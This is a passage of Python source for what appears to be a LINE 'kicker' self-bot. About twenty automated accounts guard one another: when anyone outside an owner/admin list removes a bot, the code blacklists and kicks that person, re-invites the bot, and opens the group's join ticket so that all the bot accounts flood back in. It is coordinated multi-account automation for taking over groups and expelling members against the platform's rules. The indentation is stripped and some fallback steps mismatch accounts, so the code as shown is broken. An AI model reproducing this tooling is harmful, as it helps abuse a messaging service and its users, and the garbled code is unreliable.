kicker.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker.acceptGroupInvitation(op.param1)
except:
pass
return
if Bmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
G = kicker6.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.updateGroup(G)
Ticket = kicker6.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker6.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker6.updateGroup(G)
Ticket = kicker6.reissueGroupTicket(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker2.acceptGroupInvitation(op.param1)
except:
pass
return
if Cmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
G = kicker7.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.updateGroup(G)
Ticket = kicker7.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker7.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker7.updateGroup(G)
Ticket = kicker7.reissueGroupTicket(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker3.acceptGroupInvitation(op.param1)
except:
pass
return
if Dmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
G = kicker8.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.updateGroup(G)
Ticket = kicker8.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker8.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker8.updateGroup(G)
Ticket = kicker8.reissueGroupTicket(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker4.acceptGroupInvitation(op.param1)
except:
pass
return
if Emid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
G = kicker9.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.updateGroup(G)
Ticket = kicker9.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker9.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker9.updateGroup(G)
Ticket = kicker9.reissueGroupTicket(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker5.acceptGroupInvitation(op.param1)
except:
pass
return
if Fmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker7.kickoutFromGroup(op.param1,[op.param2])
kicker7.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
G = kicker10.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.updateGroup(G)
Ticket = kicker10.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker10.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker10.updateGroup(G)
Ticket = kicker10.reissueGroupTicket(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker5.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker6.acceptGroupInvitation(op.param1)
except:
pass
return
if Gmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker8.kickoutFromGroup(op.param1,[op.param2])
kicker8.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
G = kicker11.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.updateGroup(G)
Ticket = kicker11.reissueGroupTicket(op.param1)
line.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker2.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker3.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker4.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker5.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker6.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker7.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker8.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker9.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker10.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker11.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker12.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker13.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker14.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker15.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker16.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker17.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker18.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker19.acceptGroupInvitationByTicket(op.param1,Ticket)
kicker20.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kicker11.getGroup(op.param1)
G.preventedJoinByTicket = True
kicker11.updateGroup(G)
Ticket = kicker11.reissueGroupTicket(op.param1)
except:
try:
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker13.kickoutFromGroup(op.param1,[op.param2])
kicker13.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker14.kickoutFromGroup(op.param1,[op.param2])
kicker14.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker15.kickoutFromGroup(op.param1,[op.param2])
kicker15.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker16.kickoutFromGroup(op.param1,[op.param2])
kicker16.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker17.kickoutFromGroup(op.param1,[op.param2])
kicker17.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker18.kickoutFromGroup(op.param1,[op.param2])
kicker18.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker19.kickoutFromGroup(op.param1,[op.param2])
kicker19.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker20.kickoutFromGroup(op.param1,[op.param2])
kicker20.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker2.kickoutFromGroup(op.param1,[op.param2])
kicker2.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker3.kickoutFromGroup(op.param1,[op.param2])
kicker3.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker4.kickoutFromGroup(op.param1,[op.param2])
kicker4.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
kicker5.kickoutFromGroup(op.param1,[op.param2])
kicker6.kickoutFromGroup(op.param1,[op.param2])
kicker6.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
try:
line.inviteIntoGroup(op.param1,[op.param3])
kicker7.acceptGroupInvitation(op.param1)
except:
pass
return
if Hmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kicker9.kickoutFromGroup(op.param1,[op.param2])
kicker9.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker10.kickoutFromGroup(op.param1,[op.param2])
kicker10.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
kicker11.kickoutFromGroup(op.param1,[op.param2])
kicker11.inviteIntoGroup(op.param1,[op.param3])
kicker8.acceptGroupInvitation(op.param1)
except:
try:
G = kicker12.getGroup(op.param1)
G.preventedJoinByTicket = False
kicker12.kickoutFromGroup(op.param1,[op.param2])
kicker12.updateGroup(G)
Ticket = kicker12.reissueGroupTicket(op.param1)
